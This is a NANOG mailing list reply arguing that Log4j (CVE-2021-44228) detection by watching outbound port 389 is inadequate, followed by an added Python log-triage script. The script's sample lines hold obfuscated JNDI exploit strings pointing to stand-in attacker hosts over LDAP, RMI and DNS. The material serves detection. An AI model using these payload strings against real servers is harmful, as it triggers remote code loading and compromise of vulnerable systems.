nanog mailing list archives

Re: Log4j mitigation


From: "Jörg Kost" <jk () ip-clear de>
Date: Mon, 13 Dec 2021 13:12:25 +0100

Yes, but it won't change the outcome. We shall run with the assume-breach paradigm. In this scenario, it might be useless to look around for port 389 only; it can give you a wrong assumption.

When a vulnerable system has a reachable path to the Internet and can open a reverse shell from the URI alone, waiting for 389 is hopeless. 389 might be the initial starting port for the first wave of scanners and opportunistic attackers, but it has already developed further.

Cloudflare already talks about the broad spectrum of possible payloads, where you can see that people try to load their payload via DNS (port 53). Similar to what I posted half an hour ago.

https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/


On 13 Dec 2021, at 13:04, Joe Greco wrote:

On Mon, Dec 13, 2021 at 12:39:58PM +0100, Jörg Kost wrote:
> You can't see it.

I think you meant "you can't reliably see it".  This doesn't mean
that it isn't worth looking for obvious cases where you CAN see
it.

... JG
--
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
"The strain of anti-intellectualism has been a constant thread winding its way through our political and cultural life, nurtured by the false notion that democracy means that 'my ignorance is just as good as your knowledge.'" -Asimov

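The point argued above, that watching outbound TCP/389 catches only the first-wave LDAP payloads and misses rmi://, dns:// and LDAP on non-default ports, can be shown on log data. The following is an added example, not code from this thread or from the Cloudflare post: it unwraps the nested-lookup obfuscation seen in CVE-2021-44228 payloads (${lower:...}, ${::-x} default-value tricks, URL encoding), pulls the JNDI scheme, host and port out of each line, and reports which hits a 389-only watch would never see. The sample log lines, the 198.51.100.7 address and the host.attacker.example name are constructed for the demo; treating the "jndi" lookup name as case-insensitive and assuming attacker-chosen lookups fall through to their default text are detection choices made here, not facts taken from the page.

```python
"""Added example (not from the NANOG thread or the Cloudflare post): extract
JNDI lookups from log lines to show why watching outbound TCP/389 alone is
not a detection strategy for CVE-2021-44228.  Sample lines, addresses and
host names below are constructed for this demo."""
import re
from urllib.parse import unquote

# Innermost ${...} that contains no further ${ (resolved inside-out).
_INNER = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>://<host>[:<port>]...} after normalization.  The lookup
# name is matched case-insensitively here (a detection choice).
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:\s*//([^/:}\s]+)(?::(\d+))?",
    re.IGNORECASE,
)
# Well-known default ports for the schemes seen in these payloads.
DEFAULT_PORT = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}


def _resolve_inner(m):
    body = m.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return m.group(0)                  # keep the JNDI lookup itself intact
    if ":-" in body:                       # ${x:y:-default}: attacker-chosen lookups
        return body.split(":-", 1)[1]      # fail on purpose, so the default is emitted
    key, sep, val = body.partition(":")
    if sep and key.strip().lower() == "lower":
        return val.lower()
    if sep and key.strip().lower() == "upper":
        return val.upper()
    return body                            # unknown lookup: keep its text


def normalize(s, max_rounds=20):
    """Undo URL-encoding (at most twice) and nested-lookup obfuscation (bounded)."""
    for _ in range(2):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, s)
        if new == s:
            break
        s = new
    return s


def jndi_targets(line):
    """Return [(scheme, host, port)] for every JNDI lookup in one log line."""
    out = []
    for m in _JNDI.finditer(normalize(line)):
        scheme = m.group(1).lower()
        port = int(m.group(3)) if m.group(3) else DEFAULT_PORT.get(scheme)
        out.append((scheme, m.group(2), port))
    return out


def triage(lines):
    """Split lines into (all JNDI hits, hits a TCP/389-only watch would never see)."""
    hits, missed = [], []
    for line in lines:
        targets = jndi_targets(line)
        if not targets:
            continue
        hits.append((line, targets))
        if not any(s == "ldap" and p == 389 for s, _, p in targets):
            missed.append((line, targets))
    return hits, missed


# Constructed access-log lines: plain LDAP, obfuscated RMI, URL-encoded DNS,
# default-value-obfuscated LDAP on a non-default port, and a benign line.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:12:04:11 +0100] "GET /?x=${jndi:ldap://198.51.100.7:389/a} HTTP/1.1" 200 12',
    '10.0.0.5 - - [13/Dec/2021:12:05:02 +0100] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/x}"',
    '10.0.0.5 - - [13/Dec/2021:12:06:40 +0100] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fhost.attacker.example%2Fa%7D HTTP/1.1" 200 12',
    '10.0.0.5 - - [13/Dec/2021:12:07:19 +0100] "GET / HTTP/1.1" 200 12 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap${env:NaN:-:}//198.51.100.7:1389/o}"',
    '10.0.0.5 - - [13/Dec/2021:12:08:00 +0100] "GET /report?year=${date:yyyy} HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    hits, missed = triage(SAMPLE_LOGS)
    print(f"{len(hits)} JNDI hits, {len(missed)} invisible to a TCP/389-only watch:")
    for line, targets in missed:
        print("  ", targets)
```

Of the four hits in the constructed sample, three (rmi on 1099, dns on 53, ldap on 1389) would produce no outbound connection to port 389 at all, which is the gap the message above describes.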
